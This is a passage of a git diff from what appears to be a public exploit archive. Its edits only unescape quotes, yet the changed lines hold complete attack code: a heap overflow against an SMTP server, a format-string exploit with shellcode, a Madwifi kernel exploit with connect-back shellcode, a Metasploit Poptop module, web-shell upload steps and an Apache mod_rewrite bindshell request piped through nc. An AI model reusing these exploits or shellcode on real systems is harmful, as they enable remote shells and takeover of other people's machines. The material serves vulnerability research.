terminated.\n"); else if (l < 0) - die(\"\\n - Read failure\\n\"); + die("\n - Read failure\n"); if (write(STDOUT_FILENO, buf, l) < 1) - die(\"write\"); + die("write"); } } } @@ -255,13 +255,13 @@ int parse_args(int argc, char **argv, char **host, int *npad, *host = argv[1]; - if(sscanf(argv[2], \"%d\", npad) != 1) + if(sscanf(argv[2], "%d", npad) != 1) return 1; - if(sscanf(argv[3], \"%x\", retloc) != 1) + if(sscanf(argv[3], "%x", retloc) != 1) return 1; - if(sscanf(argv[4], \"%x\", retaddr) != 1) + if(sscanf(argv[4], "%x", retaddr) != 1) return 1; return 0; @@ -279,35 +279,35 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr) /* read greeting */ n = Recv(sock, buf, BS, 0); if(n == 0) - bye(\"Server didn\'t even say hi\"); + bye("Server didn't even say hi"); /* send HELO */ - n = snprintf(buf, BS, \"HELO localhost\\r\\n\"); + n = snprintf(buf, BS, "HELO localhost\r\n"); Send(sock, buf, n, 0); Z(buf, BS); n = Recv(sock, buf, BS, 0); if(n == 0) - bye(\"Server didn\'t respond to HELO\"); + bye("Server didn't respond to HELO"); - printf(\"--{ Said HELO\\n\\n\"); + printf("--{ Said HELO\n\n"); /* * Build evil chunk overflow. The need to align chunk exactly makes this - * not so robust. In my short testing I wasn\'t able to get free() called - * directly on an area of memory we control. I\'m sure you can though if you - * take some time to study process heap behavior. Note though that you\'ll + * not so robust. In my short testing I wasn't able to get free() called + * directly on an area of memory we control. I'm sure you can though if you + * take some time to study process heap behavior. Note though that you'll * have to fill in the magic cookie field that xmalloc()/xfree() and some - * other functions use, so you\'ll still need to have it aligned properly + * other functions use, so you'll still need to have it aligned properly * which defeats the whole purpose. This exploits the free() call on the * buffer we overflow, so you have to align the next chunk accordingly. * Anyhow on newest glibc there is a check for negative size field on the * chunk being freed, and program dies if it is negative (the exact * condition is not negative, but it has that effect pretty much, but go - * look yourself ;)), So the techniques outlined by gera in phrack don\'t + * look yourself ;)), So the techniques outlined by gera in phrack don't * work (being able to point all chunks at our two evil chunks). Check out - * most recent glibc code in _int_free() if you haven\'t already. + * most recent glibc code in _int_free() if you haven't already. */ - memset(pad, \'A\', npad); + memset(pad, 'A', npad); chunk.dummy = CHUNKSZ; chunk.prevsz = CHUNKSZ; @@ -318,20 +318,20 @@ void sploit(int sock, int npad, u_int retloc, u_int retaddr) evil[CHUNKLEN] = 0; /* send the overflow */ - n = snprintf(buf, BS, \"MAIL FROM: %s%s\\n\", pad, evil, sc); + n = snprintf(buf, BS, "MAIL FROM: %s%s\n", pad, evil, sc); Send(sock, buf, n, 0); Z(buf, BS); - printf(\"--{ Sent MAIL FROM overflow\\n\\n\"); + printf("--{ Sent MAIL FROM overflow\n\n"); #define SLEEP_TIME 15 setbuf(stdout, NULL); - printf(\"--{ Going for shell in \"); + printf("--{ Going for shell in "); for(n = 0; n < SLEEP_TIME; n++){ - printf(\"%d \", SLEEP_TIME-n); + printf("%d ", SLEEP_TIME-n); sleep(1); } - puts(\"\\n\"); + puts("\n"); } @@ -344,21 +344,21 @@ int main(int argc, char **argv) char *host = NULL; if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr)) - bye(\"Usage: %s < host > < padding > < retloc > < retaddr >\\n\", argv[0]); + bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]); - printf(\"--{ Smack 1.oohaah\\n\\n\"); + printf("--{ Smack 1.oohaah\n\n"); sock = conn(host, SMTP_PORT); - printf(\"--{ definitely, adv.:\\n\" - \"--{ 1. Having distinct limits\\n\" - \"--{ 2. Indisputable; certain\\n\" - \"--{ 3. Clearly defined; explicitly precise\\n\\n\" + printf("--{ definitely, adv.:\n" + "--{ 1. Having distinct limits\n" + "--{ 2. Indisputable; certain\n" + "--{ 3. Clearly defined; explicitly precise\n\n" ); sploit(sock, npad, retloc, retaddr); - printf(\"--{ Attempting to redefine the meaning of \'definitely\'\\n\\n\"); + printf("--{ Attempting to redefine the meaning of 'definitely'\n\n"); shell(host, SHELL_PORT); diff --git a/platforms/linux/remote/307.py b/platforms/linux/remote/307.py index 0ab739fa0..92702125d 100755 --- a/platforms/linux/remote/307.py +++ b/platforms/linux/remote/307.py @@ -17,18 +17,18 @@ pad = 2 #0000000F FFE1 jmp ecx # read(4, esp, -1); jmp ecx -lnx_readsc = \"\\x31\\xdb\\xf7\\xe3\\xb0\\x03\\x80\\xc3\\x04\\x89\\xe1\\x4a\\xcd\\x80\\xff\\xe1\" -lnx_stage_one = \"\\x90\" * (23 - len(lnx_readsc)) + lnx_readsc +lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1" +lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc # dup2 shellcode(4->0,1,2) -lnx_stage_two = \"\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\xb2\\x3f\\x88\\xd0\\xb3\\x04\" -lnx_stage_two += \"\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\\x89\\xd0\\x41\\xcd\\x80\" +lnx_stage_two = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04" +lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80" # execute /bin/sh -lnx_stage_two += \"\\x90\" * 100 -lnx_stage_two += \"\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\" -lnx_stage_two += \"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\" -lnx_stage_two += \"\\xe1\\x8d\\x42\\x0b\\xcd\\x80\" +lnx_stage_two += "\x90" * 100 +lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68" +lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89" +lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80" -targets = [ [ 0 ], [ \"Compiled test platform\", 0x0804c418, 0xbffff9e8 ] ] +targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ] bruteforce = 0 @@ -37,13 +37,13 @@ self.host = host self.port = port set = 0 -if(os == \"linux\"): +if(os == "linux"): set = 1 self.stage_one = self.lnx_stage_one self.stage_two = self.lnx_stage_two if(set == 0): -print \"Unknown OS\" +print "Unknown OS" os._exit() self.os = os @@ -74,48 +74,48 @@ self.fd.connect((self.host, self.port)) def exploit(self, where, what): if(not self.fd or self.fd is None): self.connect() -self.already_written = len(\'gethostbyname(\') +self.already_written = len('gethostbyname(') -#print \"# of nops: %d\\n\" % (23 - len(self.readsc)) +#print "# of nops: %d\n" % (23 - len(self.readsc)) -exploit = \"x\" * self.pad +exploit = "x" * self.pad self.already_written += self.pad -exploit += struct.pack(\"> 16) -fill = \"%1$\" + str(l) + \"u\" +fill = "%1$" + str(l) + "u" exploit += fill -exploit += \"%8$hn\" +exploit += "%8$hn" -#print \"[*] Format string: (%s) Len: %d\" % (exploit, len(exploit)) -#print \"[*] Stage 1 length: %d\" % len(self.stage_one) +#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit)) +#print "[*] Stage 1 length: %d" % len(self.stage_one) #time.sleep(5) try: -self.fd.send(exploit + self.stage_one + \"\\n\") +self.fd.send(exploit + self.stage_one + "\n") self.fd.send(self.stage_two) time.sleep(1) -self.fd.send(\"echo spawned; uname -a; id -a;\\n\") -print \"Recieved: \" + self.fd.recv(1024) +self.fd.send("echo spawned; uname -a; id -a;\n") +print "Recieved: " + self.fd.recv(1024) except: self.fd.close() self.fd = None -print \"\\tFailed @ 0x%08x\" % what +print "\tFailed @ 0x%08x" % what return 0 remote = telnetlib.Telnet() remote.sock = self.fd -print \"[*] You should now have a shell\" +print "[*] You should now have a shell" remote.interact() os.exit(0) @@ -125,23 +125,23 @@ r.exploit(where, i) def run(self): if(self.bruteforce): -print \"Bruteforcing..\" -#print \"not implemented yet\" +print "Bruteforcing.." +#print "not implemented yet" #os._exit(1) for i in range(0x0804c000, 0x0804d000, 0x100 / 6): -print \"Trying: 0x%08x\" % i +print "Trying: 0x%08x" % i self.force(i, 0xbffffa00, 0xbffff9c0) #self.exploit(self.args[1], self.args[2]) -if __name__ == \'__main__\': +if __name__ == '__main__': if(len(sys.argv) != 4): -print \"%s host [linux] targetid\" -print \"- 0 to brute force\" -print \"- 1 custom compile\" +print "%s host [linux] targetid" +print "- 0 to brute force" +print "- 1 custom compile" os._exit(0) -print \"%s-%s-%s\" % (sys.argv[1], sys.argv[2], sys.argv[3]) +print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3]) r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3])) #r.exploit(0x0804c418, 0xbffff9e8) #r.force(0x0804c418, 0xbffffa00, 0xbffff800) diff --git a/platforms/linux/remote/3389.c b/platforms/linux/remote/3389.c index 6356212b1..c3bcb6310 100755 --- a/platforms/linux/remote/3389.c +++ b/platforms/linux/remote/3389.c @@ -9,7 +9,7 @@ * .... * .... * the function re-uses args in the stack before returning so we - * can\'t trash them overwriting. + * can't trash them overwriting. * Different compiled module [ex. different version of gcc] may require * a different pad value.. (see -g option) * @@ -130,69 +130,69 @@ unsigned int pad_space = PAD_SPACE; #define SUB_OFFSET_PATCH 8 char ring0_code[]= - \"\\xe8\\x00\\x00\\x00\\x00\" //call 8048359 - \"\\x5e\" //pop %esi - \"\\x81\\xee\\x88\\x00\\x00\\x00\" //sub $0x88,%esi /* PATCH */ - \"\\x31\\xc0\" //xor %eax,%eax - \"\\xb0\\x04\" //mov $0x4,%al - \"\\x01\\xc4\" //add %eax,%esp - \"\\x83\\x3c\\x24\\x73\" //cmp $0x73,%esp - \"\\x75\\xf8\" //jne 8048364 - \"\\x83\\x7c\\x24\\x0c\\x7b\" //cmpl $0x7b,0xc(%esp) - \"\\x75\\xf1\" //jne 8048364 - \"\\x29\\xc4\" //sub %eax,%esp - \"\\x8b\\x7c\\x24\\x0c\" //mov 0xc(%esp),%edi - \"\\x89\\x3c\\x24\" //mov %edi,(%esp) - \"\\x31\\xc9\" //xor %ecx,%ecx - \"\\xb1\\x5b\" //mov $0x5b,%cl /* FIX */ - \"\\xf3\\xa4\" //rep movsb %ds:(%esi),%es:(%edi) - \"\\xcf\"; //iret + "\xe8\x00\x00\x00\x00" //call 8048359 + "\x5e" //pop %esi + "\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */ + "\x31\xc0" //xor %eax,%eax + "\xb0\x04" //mov $0x4,%al + "\x01\xc4" //add %eax,%esp + "\x83\x3c\x24\x73" //cmp $0x73,%esp + "\x75\xf8" //jne 8048364 + "\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp) + "\x75\xf1" //jne 8048364 + "\x29\xc4" //sub %eax,%esp + "\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi + "\x89\x3c\x24" //mov %edi,(%esp) + "\x31\xc9" //xor %ecx,%ecx + "\xb1\x5b" //mov $0x5b,%cl /* FIX */ + "\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi) + "\xcf"; //iret /* connect back */ #define IP_OFFSET 35 #define PORT_OFFSET 44 char u_code[] = -\"\\x31\\xc0\\x89\\xc3\\x40\\x40\\xcd\\x80\\x39\\xc3\\x74\\x03\\x31\\xc0\\x40\\xcd\\x80\" /* fork */ -\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x5b\\x5d\" -\"\\xbe\" -\"\\xf5\\xff\\xff\\xfe\" // ~ip -\"\\xf7\\xd6\\x56\\x66\\xbd\" -\"\\x69\\x7a\" // port -\"\\x0f\\xcd\\x09\\xdd\\x55\\x43\\x6a\\x10\\x51\\x50\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x87\\xd9\" -\"\\x5b\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\" -\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\xeb\\xdf\"; +"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */ +"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d" +"\xbe" +"\xf5\xff\xff\xfe" // ~ip +"\xf7\xd6\x56\x66\xbd" +"\x69\x7a" // port +"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9" +"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68" +"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf"; /* 802.11header + WPA IE prolog */ #define WPA_LEN_OFFSET 55 #define CHANNEL 11 char beacon_80211_wpa[] = -\"\\x80\" // management frame / subtype beacon -\"\\x00\" // flags -\"\\x00\\x00\" // duration -\"\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\" // destination addr -\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\" // src address -\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\" // bbsid -\"\\x00\\x00\" // seq -\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // timestamp -\"\\x64\\x00\" // interval -\"\\x01\\x00\" // caps -\"\\x00\\x03\\x41\\x41\\x41\" // ssid Information Element -\"\\x01\\x08\\x82\\x84\\x8b\\x96\\x0c\\x18\\x30\\x48\" // rates Information Element -\"\\x03\\x01\\x0B\" // channel Information Element (11) -\"\\xdd\\xc6\" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */ -\"\\x00\\x50\\xf2\\x01\\x01\\x00\"; // oui + type + version (first 6 byte of len) +"\x80" // management frame / subtype beacon +"\x00" // flags +"\x00\x00" // duration +"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr +"\xCC\xCC\xCC\xCC\xCC\xCC" // src address +"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid +"\x00\x00" // seq +"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp +"\x64\x00" // interval +"\x01\x00" // caps +"\x00\x03\x41\x41\x41" // ssid Information Element +"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element +"\x03\x01\x0B" // channel Information Element (11) +"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */ +"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len) #define JUMP_OFFSET_PATCH 1 -char jmp_back[]=\"\\xeb\\x00\"; +char jmp_back[]="\xeb\x00"; /* ----------------------------------- */ void usage(char *prog) { - printf(\"[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\\n\", prog); + printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog); } unsigned char *build_frame() @@ -203,10 +203,10 @@ unsigned char *build_frame() unsigned int hsb = sizeof(ring0_code)-1; unsigned int lsb = SHELLCODE_SPACE - hsb; - printf(\"[*][low-kcode]: %d\\n[*][high-ucode]: %d\\n\", + printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n", lsb, hsb); - printf(\"[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\\n\", + printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n", sizeof(u_code)-1, sizeof(ring0_code)-1); /* fix jump */ @@ -217,11 +217,11 @@ unsigned char *build_frame() unsigned int sub = 5 + (sizeof(u_code)-1); FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub); - printf(\"[*][payload space]: %d\\n\", PAYLOAD_SPACE); + printf("[*][payload space]: %d\n", PAYLOAD_SPACE); /* fix beacon_80211_wpa: WPA len */ FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6); - printf(\"[*][beacon_WPA_IE_lenght]: %u\\n\", + printf("[*][beacon_WPA_IE_lenght]: %u\n", (unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]); /* fill frame */ @@ -256,43 +256,43 @@ unsigned char *build_frame() void print_frame(unsigned char *frame, unsigned int size) { int i; - printf(\"\\n[printing frame - start]\\n \"); + printf("\n[printing frame - start]\n "); for(i=1; i<=size; i++) { - printf(\"%02x \", frame[i-1]); + printf("%02x ", frame[i-1]); if((i % 16) == 0) - printf(\"\\n \"); + printf("\n "); } - printf(\"\\n[printing frame - end]\\n\"); + printf("\n[printing frame - end]\n"); } void parse_arg(int argc, char **argv) { int opt; struct in_addr in; - while( (opt=getopt(argc, argv, \"j:i:a:p:d:g:\")) != EOF) + while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF) { switch(opt) { - case \'j\': + case 'j': jmp_address = strtoll(optarg, NULL, 16); break; - case \'a\': + case 'a': ip = strdup(optarg); inet_aton(ip, &in); FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr)); break; - case \'p\': + case 'p': port = atoi(optarg); FIX_WORD(u_code, PORT_OFFSET, port); break; - case \'d\': + case 'd': driver = strdup(optarg); break; - case \'i\': + case 'i': iface = strdup(optarg); break; - case \'g\': + case 'g': pad_space = atoi(optarg); break; default: @@ -318,10 +318,10 @@ int main(int argc, char *argv[]) exit(1); } - printf( \"\\n\\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\\n\\t exploit code: sgrakkyu antifork.org\\n\" - \"-------------------- **** ------------------\\n\" - \"[opt-ip]: %s\\n[opt-port]: %d\\n[opt-iface]: %s\\n[opt-driver]: %s\\n[opt-jump]: 0x%08x\\n[pad]: %d\\n\" - \"-------------------- **** ------------------\\n\\n\", + printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu antifork.org\n" + "-------------------- **** ------------------\n" + "[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n" + "-------------------- **** ------------------\n\n", ip, port, iface, driver, jmp_address, pad_space); unsigned char *frame = build_frame(); @@ -333,30 +333,30 @@ int main(int argc, char *argv[]) /* Validate the driver name specified */ if (drivertype == INJ_NODRIVER) { - fprintf(stderr, \"Driver name not recognized.\\n\"); + fprintf(stderr, "Driver name not recognized.\n"); return -1; } if (tx80211_init(&in_tx, iface, drivertype) < 0) { - fprintf(stderr, \"Error initializing drive \\\"%s\\\".\\n\", argv[1]); + fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]); return -1; } if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0) { - fprintf(stderr, \"Driver does not support transmitting control frames.\\n\"); + fprintf(stderr, "Driver does not support transmitting control frames.\n"); return -1; } if (tx80211_setchannel(&in_tx, CHANNEL) < 0) { - fprintf(stderr, \"Error setting channel.\\n\"); + fprintf(stderr, "Error setting channel.\n"); return 1; } if (tx80211_open(&in_tx) < 0) { - fprintf(stderr, \"Unable to open interface %s.\\n\", in_tx.ifname); + fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname); return 1; } @@ -364,15 +364,15 @@ int main(int argc, char *argv[]) in_packet.packet = frame; in_packet.plen = TOTAL_PACKET_LEN; - printf(\"[sending packets]: about 10 a second\\n\"); + printf("[sending packets]: about 10 a second\n"); while(i < 10000) { /* Transmit the packet */ if (tx80211_txpacket(&in_tx, &in_packet) < 0) { - fprintf(stderr, \"Unable to transmit packet.\\n\"); - perror(\"txpacket\"); + fprintf(stderr, "Unable to transmit packet.\n"); + perror("txpacket"); return 1; } i++; diff --git a/platforms/linux/remote/9952.rb b/platforms/linux/remote/9952.rb index c4bfa73ef..b558a7136 100755 --- a/platforms/linux/remote/9952.rb +++ b/platforms/linux/remote/9952.rb @@ -10,7 +10,7 @@ ## -require \'msf/core\' +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote @@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - \'Name\' => \'Poptop Negative Read Overflow\', - \'Description\' => %q{ + 'Name' => 'Poptop Negative Read Overflow', + 'Description' => %q{ This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. @@ -32,40 +32,40 @@ class Metasploit3 < Msf::Exploit::Remote Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock. }, - \'Author\' => \'spoonm\', - \'License\' => MSF_LICENSE, - \'Version\' => \'$Revision$\', - \'References\' => + 'Author' => 'spoonm', + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => [ - [\'CVE\', \'2003-0213\'], - [\'OSVDB\', \'3293\'], - [\'URL\', \'http://securityfocus.com/archive/1/317995\'], - [\'URL\', \'http://www.freewebs.com/blightninjas/\'], + ['CVE', '2003-0213'], + ['OSVDB', '3293'], + ['URL', 'http://securityfocus.com/archive/1/317995'], + ['URL', 'http://www.freewebs.com/blightninjas/'], ], - \'Privileged\' => true, - \'Payload\' => + 'Privileged' => true, + 'Payload' => { # Payload space is dynamically determined - \'MinNops\' => 16, - \'StackAdjustment\' => -1088 + 'MinNops' => 16, + 'StackAdjustment' => -1088 }, - \'SaveRegisters\' => [ \'esp\' ], - \'Platform\' => \'linux\', - \'Arch\' => ARCH_X86, - \'Targets\' => + 'SaveRegisters' => [ 'esp' ], + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'Targets' => [ - [\'Linux Bruteforce\', - { \'Bruteforce\' => + ['Linux Bruteforce', + { 'Bruteforce' => { - \'Start\' => { \'Ret\' => 0xbffffa00 }, - \'Stop\' => { \'Ret\' => 0xbffff000 }, - \'Step\' => 0 + 'Start' => { 'Ret' => 0xbffffa00 }, + 'Stop' => { 'Ret' => 0xbffff000 }, + 'Step' => 0 } } ], ], - \'DefaultTarget\' => 0, - \'DisclosureDate\' => \'Apr 9 2003\')) + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 9 2003')) register_options( [ @@ -74,26 +74,26 @@ class Metasploit3 < Msf::Exploit::Remote register_advanced_options( [ - OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address. Affects PayloadSpace.\", 220 ]), - OptInt.new(\"RetLength\", [ true, \"Length of returns after payload.\", 32 ]), - OptInt.new(\"ExtraSpace\", [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]), - OptString.new(\"Hostname\", [ false, \"PPTP Packet hostname\", \'\' ]), - OptString.new(\"Vendor\", [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]), + OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]), + OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]), + OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]), + OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]), + OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]), ], self.class) end # Dynamic payload space calculation def payload_space - datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i + datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i end def build_packet(length) - [length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') + - [1,0].pack(\'cc\') + - [0].pack(\'n\') + - [1,1,0,2600].pack(\'NNnn\') + - datastore[\'Hostname\'].ljust(64, \"\\x00\") + - datastore[\'Vendor\'].ljust(64, \"\\x00\") + [length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') + + [1,0].pack('cc') + + [0].pack('n') + + [1,1,0,2600].pack('NNnn') + + datastore['Hostname'].ljust(64, "\x00") + + datastore['Vendor'].ljust(64, "\x00") end def check @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote def brute_exploit(addrs) connect - print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\") + print_status("Trying #{"%.8x" % addrs['Ret']}...") # Construct the evil length packet packet = build_packet(1) + payload.encoded + - ([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4)) + ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4)) sock.put(packet) diff --git a/platforms/linux/webapps/10427.txt b/platforms/linux/webapps/10427.txt index 07a5f3edc..e46beb1fc 100755 --- a/platforms/linux/webapps/10427.txt +++ b/platforms/linux/webapps/10427.txt @@ -16,17 +16,17 @@ | 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php | | -| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click \"modfier\" +| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier" | | -| 3-Now upload your shell in \"php.jpg\" format +| 3-Now upload your shell in "php.jpg" format | | -| 4-Finally do a right click in the icon situated in \"Apparence\" then copy the link of your shell. +| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell. | [-]############################################################# | -|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim\'s +|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's | [-]############################################################# diff --git a/platforms/multiple/dos/2237.sh b/platforms/multiple/dos/2237.sh index cae6b5b7e..c1c0ad960 100755 --- a/platforms/multiple/dos/2237.sh +++ b/platforms/multiple/dos/2237.sh @@ -3,12 +3,12 @@ # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # -# by jack +# by jack # 2006-08-20 # # Thx to xuso for help me with the shellcode. # -# I suppose that you\'ve the \"RewriteRule kung/(.*) $1\" rule if not +# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not # you must recalculate adressess. # # Shellcode is based on Taeho Oh bindshell on port 30464 and modified @@ -19,26 +19,26 @@ # # Gulcas rulez :P -echo -e \"mod_rewrite apache off-by-one overflow\" -echo \"by jack \\n\\n\" +echo -e "mod_rewrite apache off-by-one overflow" +echo "by jack \n\n" if [ $# -ne 1 ] ; then - echo \"Usage: $0 webserver\" + echo "Usage: $0 webserver" exit fi host=$1 -echo -ne \"GET /kung/ldap://localhost/`perl -e \'print \"%90\"x128\'`%89%e6\\ -%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\ -%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\ -%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\ -%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\ -%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\ -%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\ -%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\ -%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\ -%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\ -Host: $host\\r\\n\\r\\n\" | nc $host 80 +echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\ +%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\ +%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\ +%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\ +%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\ +%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\ +%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\ +%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\ +%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\ +%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\ +Host: $host\r\n\r\n" | nc $host 80 # milw0rm.com [2006-08-21] diff --git a/platforms/multiple/dos/32208.txt b/platforms/multiple/dos/32208.txt index aa2c13e88..0a1f6fd9c 100755 --- a/platforms/multiple/dos/32208.txt +++ b/platforms/multiple/dos/32208.txt @@ -38,7 +38,7 @@ targeted at server, desktop and embedded use. VirtualBox provides -among many other features- 3D Acceleration for guest machines through its Guest Additions. This feature allows guest machines to use -the host machine\'s +the host machine's GPU to render 3D graphics based on then OpenGL or Direct3D APIs. Multiple memory corruption vulnerabilities 